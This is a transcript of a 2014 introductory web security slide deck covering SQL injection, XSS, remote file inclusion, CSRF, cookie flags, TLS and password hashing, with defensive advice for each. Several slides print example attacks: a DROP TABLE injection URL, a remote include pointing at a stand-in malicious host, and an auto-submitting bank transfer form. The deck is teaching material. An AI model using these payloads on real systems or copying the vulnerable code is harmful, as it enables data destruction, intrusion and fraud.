Upgrade to Pro — share decks privately, control downloads, hide ads and more …

RCOS Security Talk

Avatar for Kevin O'Connor Kevin O'Connor
February 28, 2014
Programming
170
3

RCOS Security Talk

Basic overview of common vulnerabilities and best practices.

Avatar for Kevin O'Connor

Kevin O'Connor

February 28, 2014

More Decks by Kevin O'Connor

See All by Kevin O'Connor
SD&D 101
Avatar for Kevin O'Connor kevinoconnor7
0
79

Other Decks in Programming

See All in Programming
技術記事、AIに書かせるか、自分で書くか? 〜それでも私が自分の手で書く理由〜 / #QiitaConference
Avatar for Junichi Ito jnchito
2
1.2k
Moments When Things Go Wrong
Avatar for Aurimas Liutikas aurimas
3
120
Swiftのレキシカルスコープ管理
Avatar for kntk kntkymt
0
200
自動レビューエンジンの実装と運用 ~レビューのない世界へ~
Avatar for Kanato kurukuru1999
2
280
AIエージェントの隔離技術の徹底比較
Avatar for kawayu kawayu
0
440
JavaDoc 再入門
Avatar for nagise nagise
0
190
AI Agent と正しく分析するための環境作り
Avatar for yosh_yumyum yoshyum
3
630
Hive Metastoreを通して学ぶIceberg REST Catalog ― 仕様から実装まで
Avatar for okumin okumin
0
290
Inspired By RubyKaigi (EN)
Avatar for Atsushi Kawamura (atzz/a2c) atzzcokek
0
260
サーバーレスで作る、動画データ管理基盤
Avatar for Keigo Ibaraki oyasumipants
0
300
LLM Plugin for Node-REDの利用方法と開発について
Avatar for 404background 404background
0
130
タクシーアプリ『GO』の バックエンド開発のおける AI利活用と若者のすべて
Avatar for Kazuhiko Yamashita pyama86
3
1.8k

Featured

See All Featured
Information Architects: The Missing Link in Design Systems
Avatar for Michelle Chin soysaucechin
0
940
Evolution of real-time – Irina Nazarova, EuRuKo, 2024
Avatar for Irina Nazarova irinanazarova
9
1.3k
Six Lessons from altMBA
Avatar for Skipper Chong Warson skipperchong
29
4.3k
HDC tutorial
Avatar for Michiel Stock michielstock
2
680
How to Grow Your eCommerce with AI & Automation
Avatar for Katarina Dahlin katarinadahlin
PRO
1
190
Practical Orchestrator
Avatar for Shlomi Noach shlominoach
191
11k
The Straight Up "How To Draw Better" Workshop
Avatar for Dennis Kardys denniskardys
239
140k
Amusing Abliteration
Avatar for ianozsvald ianozsvald
1
180
Faster Mobile Websites
Avatar for Dean Hume deanohume
310
31k
Neural Spatial Audio Processing for Sound Field Analysis and Control
Avatar for NII S. Koyama's Lab skoyamalab
0
310
The SEO identity crisis: Don't let AI make you average
Avatar for Varn varn
0
470
Impact Scores and Hybrid Strategies: The future of link building
Avatar for Tamara Novitovic tamaranovitovic
0
290

Transcript

  1. YOU SUCK at security

  2. 1. Your attackers are better

  3. Do NOT ROLL YOUR OWN

  4. None

  5. 1.  Open-source 2.  Audited 3.  Active community

  6. 2. Security is hard

  7. No. Seriously.

  8. 5,000 CVEs /yr

  9. 3. Dont trust input

  10. <?php! $query = "SELECT * FROM users WHERE username='". "$_GET[’user']."'";

    ! $result = mysql_query($query);!

  11. /derp.php?user=x’ DROP TABLE users;--!

  12. /derp.php?user=x’ DROP TABLE users;--! http://xkcd.com/327/

  13. <?php! $stmt = $dbh->prepare("SELECT FROM users WHERE username=?");! $stmt->execute(array($_GET['user']));! Use

    Parameter Binding

  14. <div><?php echo $row['username']; ?></div>! XSS. Inject javascript

  15. <html>! <body>! "<form method="POST" action="/users/add">! " "<input type="text" name="username">! "

    "<input type="password" name="password">! " "<input type="hidden" name="isAdmin" value="true">! " "<button type="submit">Create user</button>! "</form>! </body>! </html>! Unexpected Input. Sneaky DOM edit

  16. <?php! include('header.php');! include($_GET['page']);! include('footer.php');! ! /index.php?page=http://sketchy.su/BadTime.php! Remote Include.

  17. Sanitize all input

  18. Blacklist Only use if you know all cases Less restrictive

    on user

  19. Whitelist Best security Very restrictive

  20. Protip Markdown Google Caja

  21. 4. Protect your cookies

  22. Set-Cookie: SESSIONID=S8d2d1ffd5cb37209ef71982b80f16d7b! Bad Session

  23. Set-Cookie: SESSIONID=S8d2d1ffd5cb37209ef71982b80f16d7b; ! "HttpOnly; secure! GOOD Session Send over SSL

    only HTTP access only Prevents XSS theft

  24. 5. No Outsiders

  25. <iframe name="bank"></iframe>! <script>! "document.write('! " "<form ! " " action="https://MyBank.com/account/transfer"

    ! " " target="bank" ! " " method="POST" ! " " name="injected">! " " "<input type="text" name="amount" value="1000.00" />! " " "<input type="text" name="to" value="[email protected]" />! " "</form>! "');! "injected.submit();! </script>!

  26. CSRF sucks

  27. Block it. Require a unique token per request X-Frame-Options: Block

  28. 6. Encrypt everything

  29. Too expensive? startssl.com

  30. Self-sign Dev Environment openssl req -x509 -newkey des3:2048 -keyout key.pem

    - out cert.pem -days XXX!

  31. Verify All CERTS <?php! // cURL supports SSL verification! curl_setopt($ch,

    CURLOPT_SSL_VERIFYPEER, true);! ! //File_get_contents does NOT! file_get_contents($url);!

  32. Verify Servers Use server certs to verify servers to one

    another

  33. Harden SSL Disable SSL2 Disable TLS1.0 compression Disable weak ciphers

    (DES, RC4) h"p://blog.cloudflare.com/staying-­‐on-­‐top-­‐of-­‐tls-­‐a"acks  

  34. Force SSL

  35. 7. Use Slow Hashes

  36. No Plaintext Passwords Just don’t.

  37. Hash + Salt MD5 SHA1 … HMAC + bcrypt

  38. Wait. Explain. We want to be slow.

  39. Method password = bcrypt(HMAC(password, local_salt), bcrypt_salt)!

  40. Salt-free db Store salt on file system Two attacks needed

    Or both

  41. Migrate. Maintain two hashes Rehash on successful login Purge old

    hashes after x duration

  42. Lost Passwords Hash a one-time login ID

  43. 8. Remember the basics

  44. Random IV Having the IV be public is okay

  45. Wait for entropy /dev/random waits /dev/urandom non-blocking

  46. Use ECC NSA-Proof * * As far as we know,

    at least…

  47. Passwordless Login Use keypairs for server access

  48. 9. Use libraries

  49. Crypto NaCL SJCL Crypto++ QCA

  50. Web Frameworks Python: Django, Flask PHP: Laravel, Phalcon Go: Revel

    Node: Sails Java/Scala: Play Ruby: Rails

  51. Assume nothing Always research security best practices

  52. Questions? Complaints?

  53. Im hiring Sysadmin.union.rpi.edu/apply